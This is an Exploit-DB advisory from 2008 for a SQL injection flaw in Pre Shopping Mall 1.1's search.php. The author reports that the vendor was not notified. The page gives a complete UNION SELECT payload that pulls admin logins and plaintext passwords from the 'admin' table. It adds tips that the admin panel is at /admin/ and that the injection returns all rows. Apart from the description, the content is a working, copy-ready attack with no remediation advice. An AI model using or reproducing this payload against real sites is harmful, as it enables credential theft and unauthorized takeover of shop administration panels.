Lucene search

K
exploitdbT0pP8uZzEDB-ID:5551
HistoryMay 06, 2008 - 12:00 a.m.

Pre Shopping Mall 1.1 - 'search.php' SQL Injection

2008-05-0600:00:00
t0pP8uZz
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

--==+================================================================================+==--
--==+		    Pre Shopping Mall 1.1 SQL Injection Vulnerablity	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 
Script Download: http://preproject.com
DORK: N/A



Vendor Has Not Been Notified!



DESCRIPTION: 
Pre Shopping Mall suffers from multiple remote sql injection bugs.
this allows the remote attacker to pull admin credentials from the database, since the admin details are in plaintext
this makes it easy for the attacker to gain access to the administarion panel.



SQL Injection:
ADMIN: http://site.com/emall/search.php?search='/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONCAT(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/admin/*



NOTE/TIP: 
admin login is at /admin/
injection is multi-row, so it will pull all rows from a table.


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



--==+================================================================================+==--
--==+		    Pre Shopping Mall 1.1 SQL Injection Vulnerablity	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-05-06]

AI Score

7.4

Confidence

Low

Related for EDB-ID:5551